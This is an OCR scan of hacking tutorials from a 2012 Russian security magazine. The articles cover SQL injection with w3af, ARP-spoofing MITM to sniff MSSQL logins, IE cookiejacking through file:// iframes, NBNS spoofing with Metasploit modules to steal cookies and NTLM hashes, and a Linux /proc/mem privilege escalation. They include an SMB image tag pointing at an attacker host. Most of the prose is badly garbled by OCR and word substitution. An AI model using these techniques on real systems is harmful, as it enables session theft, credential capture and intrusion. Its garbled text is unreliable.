[sqlmap.sourceforge.netl, вделанный во wЗaf.

из через множества способов: Telпet,

~

cURL, Wget, Python + urll ib,

:1- выбирай, ч т по части в большинстве случаев объединение душе. В wЗaf в целях сего

предусмотрены специальные удобные инструменты. П ослать пачку однотипных НТТР-запросов со разными значениями одного с пара­

метров? Пожалуйста! Генерировать соответствующие токены можно на книжка а Pythoп. С через редактора НТТР - запросов, на котором есть инда простая п одеветка НТТ Р - синтаксиса, позволено отправлять одиночныезапросы . Ч астовозникаетнеобходимостьвыполнить

Пол у ча е мш е лл че р ез S QL-инъекцию

шифрование который строки на

URL другими словами без затей подсчитать МО5сумму. Конечно, не запрещается бегом нанять «echo -п "admin" 0 md5sum>>

:1 Как твоя милость еще дога­

на консоли, так пускать в дело на сего вделанный шифровщик немно­

Бинго! Обнаружена классическая SQ L-инъекция .

го удобнее. П ри раскрутке следующий калека SQL-инъекции важнецки

дал от пишущий эти строки , эт относительно з апускаются всё те но плагины, которые твоя милость выбираешь близ

распознавать в среде на лицо ответы веб-сервера , с целью что тебе во который бы в таком случае ни стало

об ычном ск анировании.

пригодится вделанный

diff.

Для поиска «слепых>> не без; кулей равным образом глотать специальные плагины. Вы­

Ну равно наконец, коли твоя милость « вайтхат >> либо про­

сто заседатель безопасности, в таком случае заказчику пентеста надлежит в области казать, равно как

ключим дедукция ошибок на настройках РНР равным образом попробуем задетектить т ото

«работает»уязвимост~используявозможностьзкспортазапросов

ж е ба г, же сделано вслепую. С через НТТР-редактора посылаем пару

во форматы

з апросов для нашему веб-приложению: /useг-info.php?id=1 равно /useг-info.

Python. Иными словами , не грех сказать: «От­ на жмите .. Сабмит " равным образом смотрите, что появляется

HTML, AJAX

кройте вона эту форму,

равным образом

p h p? id=1 % 0Ы , а по времени передаем р езультаты средству интересах сравнения тра нз акций. В результате близ вып по части лн е нии SQL-зaпpoca срабатывает

JS-сообщение ... >>

пр ос тейшее алгебраическое выражение, равным образом автор получаем неудовлетворительно разных

Р ассмотрим типич н ый прогноз использования сих инструмен­ тов . Запускаем прокси равным образом шаримея сообразно да вместе с следуемом у веб-приложению

отв е та [информация дл моя особа р а зны х польз по части вателей!. Дальнейшим медленный

[не забываем запустить проксирование трафика во светильник у зереl.

м ож ет вместе с похитчик всё та но э кс пл у атация со ко ули .

На вкладке Histoгy видим отображаемый на реальном времени НТТР­

OUTRO

движение в лоне браузером да сервером. В случае от больше мощным при­

ложением, на выдержку чатом , транзакций полноте гораздо больше.

WЗ af- сие действительн в отношении велий фреймворк пользу кого доска т ирования

В эдакий ситуации на правах возбраняется на руку довольно безукоризненный фильтр : не без; его

б ез оп вместе с хотя от ти веб-приложений . Рас не без; казывать в рассуждении нем позволяется долготно ,

через можно, для примеру, судить только лишь транзакции со такими за­

п касательно этом у ваш покорнейший слуга ставил прежде вместе с в отношении б что касается й задач у до показывать его во действии.

просами, которые содержат границы во строке << Запросы>> равным образом для кото­

Важно, что-нибудь сие никак не прос т относительно случающийся автосканер безопасности, а то есть

рые был получен 0хх-й ответ.

фр е ймворк, большое число дополнений тому доказательство. К тому ж е чтобы человека , сверху базовом у ровне знающего веб равным образом

Вернемся для нашему приложению. Во период навигации объединение нему

Python,

замечаем, сколько присутствие наведении держи аватар пользователя появляется

неграмотный со ставиттруда приплюсовать недостающий функционал не так — не то проверку.

всплывающее «окно>> не без; информацией об этом пользователе. Эта

К не без; тати , наравне равно любому свободному проекту, wЗaf нужны новые раз­

уведомление выдается во результате нормально го АJАХ-запроса ко

ра б отчики, тестировщики да легко активные пользователи. Кого

/useг-info.php?id=1, почто различимо на истории запросов . Давай протести ру­

з т в рассуждении з аинтересовало, собственность nожаловать во соответственный ведомость

ем текущий скрипт получи уязвимости. Для нашего запроса во карточка выбираем

рас со ылки [ wЗ af . souгce f oгge . ne t l либо для IRС-канал #wЗaf во недотка

«Audit

гequest

with ... >>- нас

интересует, глотать ли в дальнейшем SQ L-инъекция .

Fг e enode. ::х::

ld:47

ld: 06

LАутентификация J

~~-----..

[ Сбор ссылок

GЕТ http :/Jloca.lhost /u ser - i n fo .~p 0id-1 НТТР/1.1

~

Accept -l.angu•: en-us,en;q-e.s Accept-encodi ng: identity Keep-alive : 015 Accept : text/htlll, арр lication/xhtlll+XIIl, арр licat ion/XIIl: q..e. 0

user-agent : Нozilla/S.e (Xll; Linux i686; rv:2.&.1) Gecko/Z81 Accept -charset : IS0-8859 - l, ut f -8; q-e. 0, • ;q-e. 0 Нost: localtюst

Refe re r: http://localhosttindex.php Cookie: PНPS ESSI D-гf 0vdbs j ist7is3j6 rlc3p462S

Proxy- connect i on; keep- а li ve

~GЕТ h t tp ://loc al ho s t t u ser- in fo. php 0id· 0~Bl НПР/ 0 . 0

Accept- l anguage: en-us,en;q-e.S Accept-encoding : identity Keep-alive: 015 Accept: text/ht.l,application/xhtii\+XIIl ,application/xlll ;q..e. 0 , .-, . ;q-8.8 User-agent: t10zilla/S .8 (Xll ; Linux iб86; rv:2.8. 0) Gecko/28118438 Firef o Accept -charset: IS0-88S9· 0,utf -S; q-8. 0, • ;q-e. 0 Нost: localhost Referer : http://l ocalhos t /index. php Cookie: PНPS ESS I D• rf 0vdbs j ist7 is З jбrlcЗp462S Proxy-connection: keep-alive <style>

<style>

"' (height:

"'( height :

ерх; Ьorde r : 0рх; Ьorder-top:

</ style> <tаЫе Ьo rde r- " 0 "

<tа Ые Ьогdег-· е· от е\ \sp<~c i ng- " S " c\ass-· userТaЫe">

~ <1: Г><t d> Fi rs t natlf!: </td><td>Jaii'IE!s</td></t r> <t r><td>Las t na~~e : </ td><td>Bond</ td></ t r> <tr><td colspan• "2"><hr />1 like Vodka ... shaken not stirr <t r><td co\s an•"2 "><hr /><а href• "/IIIE!ssages .p_h ?to•jai'IE!s </t r> </table>

0Sellext lo compare J

ХАКЕР

03 / 058/ 00 02

Ipx solid gray;

0

0 </sty\ e>

Модель работы ранг равно болтовня для ого ск анера уязвимостей веб - прило ж ени й

ерх;

Ьorder: ерх; Ьorder-top:

l px solid gray;

~

cell spacing•" S" cla s s-~ us e rТaЫ e "> <tr><td>Firstnane: </td><td>A\isa</td></ t r> <1: r><td>Las tnaii'IE! : </td><td>Se lezneva</td></t r> <tr><td colspan•"2"><hr />Spacegir\1 J! !</td></tr> <tr><td cols an•"2"><hr /><а href• " /IIE!ssages . ~h~7to-alisa " >Send Priva </ t r> </tabl e>

[<lo::J o12

Утилита да з соединение а wЗ af ради сравнения НТТР-т ранз акций

051


ВЭЛОМ/ЕАSУ НАСК

Алексейка «GreenDog » Тюри н, Digital Security ltwitter.com/antyurinl

ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В

MSSQL

Ef.3Jf..i!f.·l ъ--

Microsoft SQL server- сие

одна с самых распространенных СУБД.

0.

Шифрование толково , хотя отключено:

ENCRYPT_O FF- ОхОО. ENCRYPT_ON - Ох01. ENCRYPT_NOT_S UP - Ox02 .

Шифрование толково равным образом включено:

З.

Шифрование недоступно:

Как да многие оставшиеся продукты питания

Microsoft, SQL server предлагает два вида аутентификации : integrated [sign-on], в таком случае вкушать аутенти­ фикацию п по части виндовой у ч етной записи, равным образом native, так лакомиться классиче­

0.

Шифрование требуется: ENCRYPT_REQ-OxOЗ.

скую, соответственно логину равно движение ролю. Оба способа используются кончено

тря получи и распишись название, кодирование возле таком значе нии используется,

часто.

а всего только ради процесса . А смотри если есть расчет

По дефопту данные, передаваемые сообразно сети, чуть было не

зашифрование далеко не используется совсем. Таким образом, да мы со тобой тотально

далеко не шифруются. Если точнее, ведь шифруется дело аутентифи­

можем осущест свивать классическую МiТМ-атаку и, подменив факты

кации пользователя, а самочки данные- нет. Конечно, к атаки

просто-напросто как только на одном движение кете, вполне отключить криптооперация

сего было бы достаточно. Зачем нам логин равным образом танцевальный шаг роль, буде я

равно отснифать аутентификационные данные.

Давай рассмотрим двум ее особенности.

0.

0. 2.

г

По дефопту устанавливается сила

ENCRYPT_O FF.

Несмо­

ENCRYPT_NOT_SUP,

Кстати, виновник сего исследования довел всё накануне логического

можем сверху лету изменить представление иначе получитьданные , только всего лишь

устроив arp-spoofiпg в лоне сервером да клиентом? Затем, что-то сие

конца - создал устройство ради

безвыгодный самое ради стое работа - переменять самую малость получай лету. Поэтом у по­

из-за нас да сделает. Только , думаю, з десь имеет смысл сделать отметку одну особен­

Metasploit Framework,

который-нибудь всё

ность. В описываемом случае часть невыгодный меняет документация в полет у,

пытаемся вытащитьлогин равным образом пароль.

а поднимает ТСР-порт, равным образом исключительно со него эмпирика редиректятся

Не где-то давненько икс подо ником fOrki изучил настоящий вопросительный знак [!J.i.LЬ'L s8g07r l. Посмотрим, почто а дьявол выудил. Дл ваш покорнейший слуга азбука то, что-нибудь дан­ ные MSSQL передаются во фигура т е Tabular DataStream protocol

для MSSQL-cepвep из-за подсчёт уже одного соединения, созданного уже атакующим, что, тем малограмотный менее, невыгодный создает особых проблем. Всё, аюшки?

требуется, - з т по отношению создать редирект трафика, приходящего

[ bit . ly/z З oVPR I. Н по части самовластно текущий пр отокол безграмотный поддерживает шифрова­

получи и распишись хост атакующего за arp-spoofing-aтaки, возьми подходящий

ние . Как но так? Откуда зашифрованные п акеты авторизации?

местного значения порт. Но равным образом эту вслед дачу

После непродолжител ьны х мучений со

на собственный часть незначительный shеll-скрипт.

Wireshark fOrki

обнаружил

автоматизировал, добавив

fOrki

будет интересную вещь: интересах шифрования после этого использу­

ется ординарный

SSL [с самоподписанным сертификатом], который TDS . Нестандартное решение. Но сие никак не приближенно

-----

-

- -

--

-

-

~--------

работает вн утри

важно. Самое интересное- сие установка ТDS-соединения, так называемого пакета

PRELOGIN . Он

-

-----

задает разнообразные

настройки да на томишко числе указывает, короче ли использоваться шифрование. За зашифрование отвечает поле рое может получать сле д ующие значения:

052

- - -

ENCRYPTION,

кото­

------------

-

-

- - - -- - - - --

Выбор метода сверху основании флагов, установленных у клиента равным образом сервера

ХАКЕР

03/158/2012


EASY

УГНАТЬ КУКИСЫ С ПОМОЩЬЮ

UI-REDRESSING

НАСК

......... ·Jйи г

В декабрьском номере][ ты да я познакомились из ёбаный вещью, на правах

clickjacking.

насчёт -·

Сrатья была очен ь полезной, же компилятор безграмотный упомянул об

одном замечательном трике. На самом деле термин

т

~ Р - ~ - G~ ·

Adcms iQ c:'iOocunert:sns.ttnat~

clickjacking ui-

малограмотный абсолютно определённо отражает естество атаки, да ми кажется, что-нибудь

сие паче правильное nонятие. И искусность , которую ваш покорный слуга

redressing -

.,_

опи ш у ниже,- самое яркое т ому подтверждение.

Итак , n озволь продемонстрировать тебе технике рассказал

cookiejacking. Впервые об этом Rosario Valotta для HITB во Амстердаме на 0011

0iS9l003 .Z<19775128.132514ИЭ9 .132 . account.в .9CJ09le. соа/ >600

году. Потенциал техники огромен- nросто до из тавь , зачем со ее по­

088086656

мощью позволительно nо хи тить куки через люб в рассуждении го балка та , аж ото защищенно­

ll3080 0SS Z

00191238

го НТТРS-протоколом! Однако на этом месте убирать небольшее сужение :

работает симпатия всего-навсего во

касательно

D

IE !но зато изумительный всех версиях! . Теперь давайте

Во-первых, симпатия использовал

IE.

0-day,

которая имеется в наличии нет слов всех

С виду сие никак не такая быстро равным образом из трашная дырка, а дальше у ее

безвыгодный чрезвычайно стремились пропатчить. Как твоя милость сейчас знаешь, во

st..edDotunerts

~ Мy((ЩIII:et"

_,;j...,__."""

посмотрим, зачем а п редлагает нам оный И Б-специалист.

версиях

.....- .

IE

Об х од кр осс- зон так й политики равно дорога ко локальным кукисам с зоны сеть

принимать

узлы. В разных зонах действуют непохожие настройки безопасности.

Rosa rio сие мячик! на другой !сетка!. Под мячик пишущий сии строки прячем выше- iframe от кукисам и, а получи самом

Н аn ри мер, описанная вне автоматиче ска аз многогрешный NТLМ-а утентфикация

сайте создаем обрабатыватель интересах переносимых данных. Н что касается да сие уже

такая фича, на правах раздвоение сверху зоны:

д ейст вует дл автор уз вылавливание зоны

lntranet

lnternet, lntranet,

доверенные

да выше. Вот сnисок зон, отсо­

- перетаранить безраздельно компонент !в прообраз е

безвыгодный всё . Нашему

iframe

автор сих строк добавляем атрибут

scrollspeed

со большим

значением. Это ничего не поделаешь интересах того, в надежде клик, совершаемый

ртированных на nорядке уменьшения привилегий:

пользователем, превращал ся во что до перацию отделения из-за итог само­

стоятельного перемещения lпроскролливанияl

Local Machine Zone Local Intranet Zone Trusted Sites Zone Internet Zone Restricted Sites Zone

iframe с самого

верха во самы й низ. Таки м образом, получается, что такое? юзер во время хунта сверху самом деле выделяет подтекстовка в мячик во корзину, перемещает сие т подтекстовка

iframe, а перемещая drag & dгор'ом, во итоге пере­

давая шрифт хакеру. Возможно, почто сверху словах всё сие престижно никак не очень понятно, а в духе всего-навсего твоя милость посмотришь видео сверху сайте

Rosario Valotta

С без п искусник н ос т ью да зонами связан до этих пор единодержавно момент- устав

I Ьit .l y/iN xvT Ь) , ведь мгновенно поймешь логику метода и, во частности, техни­

кросс-зон ног что до взаимодействия. Согласно самому общему прави­

ки сопtепt extractioп, инда разве твоя милость безвыгодный наслышан из

из побольше привил егированной . Та ким образом, повестка заключение

<iframe

JavaScript.

Думаю, зачем в эту пору проститутка концепция атаки ясна . Однако у нее лакомиться

лу, ме н ее привил егирован н а ваш покорный слуга зо в н е может взаимоде йствова ть

до некоторой степени нюансов. Во-первы х, каста нападение работает в всех ОС

кук и. Таким образом, держи стра вниз у сайта зоны сеть дозволительно

Windows, зачем равно создает проблему :1. Файлы кукисов во ХР равно в Vista/7 лежат на разных местах . Для ХР сие C: //Documents and Settings/%user_name%/Cookies, а на паче новых версий винды -C: /Users/% user_name %/AppData/Roaming/Microsoft/Wi ndows/ Cookies. Тем неграмотный менее, э т а « дело » решается хватит просто,

встав ить вместе с ожеледь ую щий фрейм:

так-таки значительная браузеров отправ л яют во каждом следовать пр осе заголо­

src="file: // c :/boot . ini " >

со страницы зоны интернетприведет

ко ошибке дост у па. Уязви мость

0-day

состоит на том, что-то кросс-зонная поведение

далеко не действует интересах оnре д елен ны х файлов, а не зачем иное чтобы файлов

вок User-Ageпt, тот или иной беда зачастую заключает во себя равным образом версию ОС.

<iframe src="file :///C: // Documents and Settings / %user_name%/Cookies " > </iframe>

Кроме того, ради опре дел ения версии ОС дозволяется пустить в ход тем же

JavaScript.

Во-вторых, вроде твоя милость , ваш покорный слуга д умаю, заметил , нам нельзя не

видеть фамилия пользо вателя для его компьютере, равно сие главная про­

Здесь % user_ пame % - сие прозвище пользователя во ОС. Куки но

блема. Для ее решения позволительно попытать счастья вынудить пользователя

у каж дог по отношению п что до ль зователя свои, п оэ в таком случае му хра нят ся они на личных п ап­

ввестись сообразно протоколу

ках . Пр да мер, иллюстрирующий считка кукисов

передает кличка пользователя наравне из другими полями. Дл автор этих строк сего

Google,

твоя милость сможешь

SMB.

Пр равным образом подключении за н ему заборщик

получи и распишись ядовитую страни ц у надлежит прибавить видишь эдакий тейлерия

уви подевать получай скриншоте.

Во-вторых , опричь 0 -d точно ветром сдуло - бага, компилятор использовал специальную

extraction lпредстав ­ лена П олом Стоуном бери BlackHat Europe - 0010, goo.g i/ZBYNw l. Зачем? Хо тя автор равным образом подгрузили во iframe обложка от кукисам и, одначе

кoд:<img

технику clickjackiпg·a лещадь названием conteпt

src=" \\attac ker.host.com\ any . jpg" ></ img >.

Конечно, снова потребуется вооружить шлифовальщик запросов

для

045

порт, а дальше создать его согласование вместе с wеЬ ­

сервером. Как видишь, изображенный путь легко шикарен! Однако

нажить д ос т у п ко данны м на н ем ты да я безграмотный можем. Здесь д ействует

потенциал е г что до использования чаще лишь огра н ичивает филь­

кросс-д омен ная стратегия , опять-таки свой сайт находится что-то около во сети,

трация такого трафика для сетевых устройствах . К тому а з д есь

а на

встает вновь одна проблема. На дворе поуже весна-красна 0012-го, а

ifram e у

нас сидит

localhost

пользователя.

Суть этой специальной т ех ники будет проста. Все совре ­ менн ы е браузеры поддерживают

drag & drop,

со п омощью которого

пофиксила у язвимость на

Microsoft

IE

Microsoft

единаче на начале осени 0011-го. Кроме того,

внесла изменения во шапка кукисов во файловой

абонент может пережить способности со что касается дног что до сайта держи др угой .

системе. Теперь их названия лишились п в отношении н ятного удобочи т аемого

Таким об ра зом, невращение е р , по мнению сут да , копирует данны е во что касается дн ом месте

вида user_пa meradomaiп[couпter].txt равно не без; т аль похожи получи и распишись буквенно­

равно вставляет во другое . Кросс -дом е нным п олитикам з д есь упрекнуть

цифровые рандамы небось 07ТVLB D W.txt. П оэтому устремиться для ним

безграмотный ко чему. Так вот, сопtепt extractioп - это, элементарнее говоря , небольшую толику

напрямую в такой мере легко сейчас неграмотный паркет учи тся. Впрочем, в соответствии с статистике,

растленный

адски малое величина и круг поль зователей ранний обновляет

drag & drop. Заманив

получи и распишись ехидный clickjackiпg-caйт

нашу жертву, да мы вместе с тобой предлагаем ей, например, побренчать во игру. Ее лейтмотив

ХАКЕР

03/158/ 00 02

от вои браузеры, особенно разве тост отлично об

IE.

053


ВЗЛОМ/ЕАSУ НАСК

СОБРАТЬ ИНФОРМАЦИЮ РЕШЕНИЕ

SkiJJ Tracino Framework

Сбор информа ц ии яв л яется об д ним с важнейших этапов подле про­

;\ ' Ift'(' '•\ , 0 0 \

l

J(r~>r

,J 0'l tlll , ' ' , о..; 0'1,

.. t l

"it .._

ведении ауДита без п аснос т да lну другими словами атаки). Ведь нам необходимо найти самое слабое помещение да после попытать счастья захапать посредством него всю систему. Но для чего иска т ь замысловатый путь, коли самым слабым местом любой, инда самой защищенной системы является чело­ век? Ты беспременно знаешь по отношению существовании экой замечательной

DNS command Une

вещи, как бы социальная инженерия. Е е плодотворность напрямую

***'*

WeЬsfte

зависит с доступной информации в отношении человеке, посему тысячи

*** IPNelghЬors

специалистов равно проводят отличаются как небо и земля исследования получи и распишись эту тему.

***,

Однако во России таковой т ен д енции в эту пору что-то невыгодный наблюдается, круглым счетом

Spamllsts

***•

как бы наши пользователи си д мы т во основном токмо во Одноклассниках

MaШngllsts

да В Контак т е, д а равно насчет ц есс информатизации до этих пор попросту безграмотный доше л

***

DNS lnformetion Gathering command line • Flen:e Domllln scan i:J

****; **** • DNSEnumtooi GI ***i • S dlg ~ns.domaln .com domaln.com AXFR ***

• The Н.rvester comm.1nd llne tool Q

Q

Machinespeclflc

давно большинства ведомст во . В любом случае ваш покорнейший слуга думаю, зачем тебя за­

интересует упоминание

lntorm•tlon

tools

***;

makensi .es/stf. Автор этой страницы отнюдь не поле­

нился сосредоточить во одном месте малограмотный плохую коллекцию всевозможных онлайн-сервисов, которые могут прийтись кстати тебе на процессе взлома другими словами пентеста, с целью обрести всю необходимую информа­ цию как бы по части человеке, приближенно равным образом касательно всей подопытной системе.

О nреде nя ем nлаги ны

WordP res s

НАЙТИ АЛЬТЕРНАТИВУ DNS И ПРОСПУФИТЬ NETBIOS

li•iaf..i!!f.ll т ·лw т

е из ли во файле блистает своим отсутствием nри вязок, производит просьба ко D NS - cepвepy. За ­ Всем нам известно, аюшки? про определения IР-адресов за именам

те м

используется акт

Здесь нелишне уточнить, сколько

закрутка в рассуждении безопасности !тогд а существовали побольше важные зада­

NetBIOS Name Seгvice. NetBIOS входит во Windows в области дефолту, а NetBIOS Name Seгvice INBNSI- сие оный но протокол, всего только

чи), вследствие чего во сегодняшнее минута на нем питаться бездна недостатков

предназначен спирт про установки соответствия посредь NеtВIОS­

со точки зрения безопасности . Однако нате смену ему подходит

именами да IР - адресами. В процессеработы сей запись либо

ONS.

Протокол проектировался помимо особой

DNSS EC,

Windows

использует такую штуку, во вкусе

равным образом моя особа надеюсь, зачем си т уа ц ия изменится на лучшую сторону. Сами не­

использует особливый WINS-cepвepa, либо отправляет широко­

достатки

пророческий задание на козни !думается, сегодня образ атаки понятна).

DNS

преимущественно изо всех сил проявляются во локальных сетях,

Но вернемся ко единаче одному важному моменту- D NS-зanpocy

особенно ежели автор сих строк можем прово д ить атаки как aгp-poisoning, позволяющие п росматривать равным образом мо д ифицировать трафик, которым

ко серверу. Если сервер ответит пользова т елю, ведь вслед п рос по части

обме н иваются жер т ва равным образом се рв е р . Н в рассуждении д авай предположим, ч т что касается

ранее малограмотный бросьте отправлен . А на правах но DNS-cepвepy н е ответи т ь, yes л да

NBNS

по части каким-то п ричинам всё э т касательно нам безвыгодный д оступно, хотя бы пишущий сии строки равно находим­

захватывающий пользователя сайт ХХХ.СО М да м ее т ОN S-за п ись?

ся во одной лока л ке от жертвой . П усть, например, на сетке при­

Здесь ты да я можем попользоваться возможнос т ями современных

сутствует некая

браузеров : поиском изо адресной строки равно подстано на который доменов

005,

да пишущий сии строки нисколько невыгодный хотим, с целью кто-нибудь заметил

нашу хакерскую давление . Тогд а нам нужно поступать тихо,

верхнего уровня

используя лишь только бивак д артные внутренние резервы протоколов. Уточню

привыкают внедрять то, почто их интересует, напрямик во а д ресную стро­

l.com,

.гu) . Как именно? Сейчас пользователи

задачу. Нам никуда не денешься круто взять куки, передаваемые пользо­

для у, а браузеры отнюдь не денно и нощно могут понять, хочет ли читатель

вателем возьми отвлеченный сайт ХХХ.СОМ. Изначально может пока­

в некоторой степени выискать на поисковике alias не мудрствуя лукаво растворить сайт. Е не без; т ь, конечно,

заться, что такое? назначение малограмотный имеет решения, хотя давайте рассмотрим, каким

определенные паттерны !например, пробелы во адресной строке),

образом ОС

Windows

а несравненно чаще браузерыв первую цепь резолвя т титул только лишь

определяет IР-адрес сайта. Первым делом

учение проверяет статическую привязку

IP для

упомянутым сверх способом . Что вновь интересней, рядом отправке

именам, хранящим ­

ся на файле hosts IC : \Windows\System32\dгiveгs\etc\hosts). Д алее,

• FiltEr: J(chs ог No.•

' 1,..

Заnрос

051.

.

08313 . 063879 485 03 . 086589 493 03 . 00'3700 494 03 . 005520 528 04. 05 0488 570 05 . 005637 URL на

...

nros ) and ip.addr

0 Time

0Destnation

0Source ~

DNS-зanpoca ко введенной пользователем строке добав л яется

0 123 2 123 123 123

=

Ejp'ession ... Cleat Арр!у 1 ProtDcol

023 2 123 255 255 255

ONS DNS DNS NBNS NBNS NBNS

lmro

. .. .

Standard query response_. NO such Standard query А makaka. stanoard query response, No such Name query NB МАКАКА<00 > Name query NB МАКАКА<00> Name query NB МАКАКА<00>

nате

nате

браузер е nоро ж дает nачку ра з личны х заnросов с целью резолва да мени

ХАКЕР

03/158/2012


EASY

027 128 162 163 185 186 258 259 319

068.190841 368. 027678 423. 072957 423.407005 442.487183 442:734222 666. 050204 666. 081655 727. 067776

092.168.0.101 192. 068. о. 002 192.168.0.101 192. 068.0.102 192. 068. о. 001 192.168.0.102 192.168.0.101 192.168.0.102 192.168.0.101

092.168.0.255 192.168 . 0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255

NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS

02 104 92 104 92 104 92 104 92

Name Name Name Name Name Name Name Name Name

query query query query query query query query query

НАСК

:00> NB ?? response NB 092.168.0.102 NB iiiliiiliiiliiil lliiilll RU<OO> response NB 092.168.0.102 NB .GOOGLE.COM<OO> response NB 092.168.0.102 NB .-RU<OO> response NB 092.168.0.102 NB AASDASD 0188RU<OO>

N B NS- cn yф ан r во д ейст вии

безусловный суффикс, на результате а стало быть полное до­

0.

Запускаем : run .

менное название .

Вернемся для краже кукисов. Итак, используя NВNS-спуфинг, да мы со тобой

Теперь нам должен подделать отзыв возьми NBNS-зanpoc. Для этого нужен Tгansaction

00

можем сфальcифицировать какой-либо рандомный запрос. Но нам нужны

изо NBNS - зanpoca . Но , во вкусе сейчас было

сказано выше, текущий представление чаще общей сложности является широковещатель­

кукисы не что-то иное от ХХХ.сот, а оттого ты да я проворачиваем неболь­

ным, а в такой мере вроде пишущий сии строки находимся на праздник но локалке , в таком случае никаких проблем

шой трюк- поднимаем веб-сервер со страничкой, содержащей

не без; его получением нет. К нашей радости, на спуфинга во

невидимый структура !можно заюзать JavaScгipt) , а поуже во зто м фрейме

MSF ранее

nрисутствует подходящий модуль. Вот краткая чертеж дей­

загружаем ХХХ.сот. Однако нам требуется отнюдь не несложно найти работу ХХХ .

ствий:

сот, так до этого времени равным образом произвести так, воеже браузер отнюдь не эврика его не без; через

0.

Загружаем модульдля Net BI OS-cynnингa:

use auxiliary/spoof/

0. 3.

0.

DNS

равно начал утилизировать для того поиска лишь

NBNS.

Очень животрепещуще ,

ради браузер продолжал подсчитывать просп уф ленный владение тем но

nbns/nbns_response. Выставляем регэпс ответов нате требования :

Set REGEX *google*. set spoofip xa.kep.

самовольно ым доменом, иным способом на силу вступят кросс-доменные политики

да никаких кукисо во автор сих строк безграмотный увидим. Так как бы указанная методика

Указываем, который IР-адрес подставлять:

IP.add r ess.

разресерчивалась по образу присест кайфовый сезон написания сего текста, в таком случае

Зanycкaeм: run.

единственным достойным вариантом отсюда следует манифест ко н есуще­

Теперь сделаю небольшее отступление. Создатель сего моду­

Теперь м по отношению ж хотя освободить общ да й алгорит м а таки :

ствующему поддомену атакуемого сайта.

ля ITiт целей

Medin) предлагал эксплуатнуть его совсем с целью други х lgoo.gi/Jz2Q9), а то есть интересах банального сбора NТLМ-хешей.

0. 2.

Поднимаем wеЬ-сервер не без; легированием входящих запросов

!чтобы соби войско кукисы) да фреймом, ссылающимся в несуще­

Е сли точнее, так впоследствии запуска вышеуказанного модуля через браузе­

ствующий поддомен ХХХ.сот !например , asdasdasd.XXX.coт ) .

ра приходит бездна запросов, п ричем чаще лишь отсюда следует

спуфить короткие имена ! как тakaka), а безвыгодный длинные lтakaka. сот). С учетом логики работы Windows короткие имена причисля­ ются ко зоне интранет !не интернетl). А сия участок во IE будто « до­

Устанавли ваем NВNS-сп уфи нг возьми до этого времени имена.

0.

Жертва, которая ввела самую малость во адресную строку браузера, спу­ фится по части

0.

NBNS да

спуфится по части

веренной», равно на ней действуют куда как меньше грозные настройки безопасности. К примеру, в этом месте разрешена автоматическая аутен­ тификация получай сайтах. Таким образом, я можем швырнуть часть

0.

редиректится в хостхакера.

Бра узер автоматом резалвит asdasdasd.XXX.coт, и, вторично же,

NBNS.

Браузер относительно тправляет кукисы ХХХ.сот в asdasdasd . XXX.coт, то есть возьми хостхаке ра.

ради сбора N Т LМ-хешей по части Н Т Т Р !хотя не грех равным образом объединение

0.

Загружаем модульдля

SMB): снифинга: use auxiliary/server/

Так им образом, ты да я можем нажить кукисы ото множества сайтов. Ед инст венн ое предел на этом месте на том, чтокукидолжны

capture/http_ntl m. 2. 3.

Страница, идеже хорошенького понемножку изготовлять ся запрос:

бытовать установле ны никак не получи и распишись ко нкретный отделение IХХХ . сот), а для землевладение

Порт, идеже поднимется веб-сервер :

I . ХХХ.сот) .

set URIPATH . set SRVPORT ве .

ПЕРЕХВАТИТЬ ТРАФИК НА

LOCALHOST ПОД WINDOWS

ы.r.&~tfl г.

Недавно ваш покорнейший слуга столкнулся вместе с безграмотный возможностью выпускать пробка

настройки

вследствие прокси быть системных обращениях для

прокси сверху

-127.0 .0.1. Почему

localhost

системных? Потому, что такое? настройки

щиеся прокси , используются большинством ПО в мер,

Python

иначе говоря для л у пбзку

IE, касаю­ Windows. Напри­

рядом использовании uгll i b2 автоматом беретик прокси

г

IE равно .NET fгатеwогk запрещаюттрафику переть через localhost равным образом 027.0.0.1 . В IE9 эту проблему посчастливилось ухлопать

вслед ностро того , что такое? на настройках не возбраняется прибрать опцию << безграмотный исполь­ зовать прокси>>-

<<-localhost».

Решение , на общем-то, крайне простое. Во - первых, дозволено

ОС . Надо отметить, в чем дело? заостреннее лишь п роблема проявляется,

управляться ко сервису по мнению любому

IP

эпизодически услуга поднят в частности бери внутреннем интерфейсе 0127.0.0.1) и недоступен возьми внешнем 00.0.0.0). В оный однова ми посчастливилось вынести решение

примем в соответствии с адресу

в качестве кого по сию пору они относятся для одному

ее каким-то обходным толково , а внове пишущий эти строки наткнулся нате инте­

резолва имен hosts l % windiг%\dгiveгs\etc\hosts) другое прозвание для lo calhost : 027.0.0.1 localhOst .

ресный абвахта во благе Eldaг Maгcussen. Он написал, почто дефолтные

ХАКЕР

03/158/2012

г

027.1.2.3, этак

во

027

подсети, за вычетом первого,

интерфейсу. Во-вторых , дозволяется nрописать во файле локального

055


Павлуня Александрович [iv i nsi d e .Ы o g s p ot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Димитрий Михайлович

[115612, дескать р. К рас н ая звездо ч ка, д . 0[

Обзор эксплоитов В этом интереснейшем обзоре автор рассматри­ ваем свежую небезупречность во ядрах

Linux,

позво­

ляющую минус особого труда увеличить услуги

0

Локальное умножение привипегий во Linux

CVSSV2

0.8

0111111 011 0 011 01111

01 01 0 [AV: L/AC: L/AU:S/C:C/1 :C/A:CI

l:iil'II3] Уязвимость связана со интерфейсом /ргос/<РI 0>/mem [где <PID> идентификатор нужного процессаl, некоторый Linux предоставляет

Microsoft Office равно Acrobat Reader, а опять же ХХЕ-инъекцию на phpMyAdmin.

про явный запи со равным образом на видеопамять процесса равным образом чтения с нее. В ядре версии

Не пропусти!

прежде не без; тат что до чно защищен ото неавторизованного доступа со через

на системе, баги на

0.6.39 разработчики у брали директиву #ifdef,

исключающую прямую

переписывание на видеопамять процесса, потому сочли, который текущий интерфейс уже других ме х анизмов ядра. На самом деле nисать во кэш процесса мож е т кому лишь не лень пользователь, обладающий достаточными правами.

Как оказалось, сии компетенция проверяютсЯ малограмотный нисколько корректно. В итоге пол у чило со ыо , чтополучилось:вовсехверсияхядра,начинаяс

0.6. 09, злое у мышл е нник может продвинуть за « карьерной лестнице» до рута любого имеющего из ваш покорный слуга пользователя .

056

ХАКЕР

03/158/20 02


Обзор экс пло итов

цt:J4!·Jii

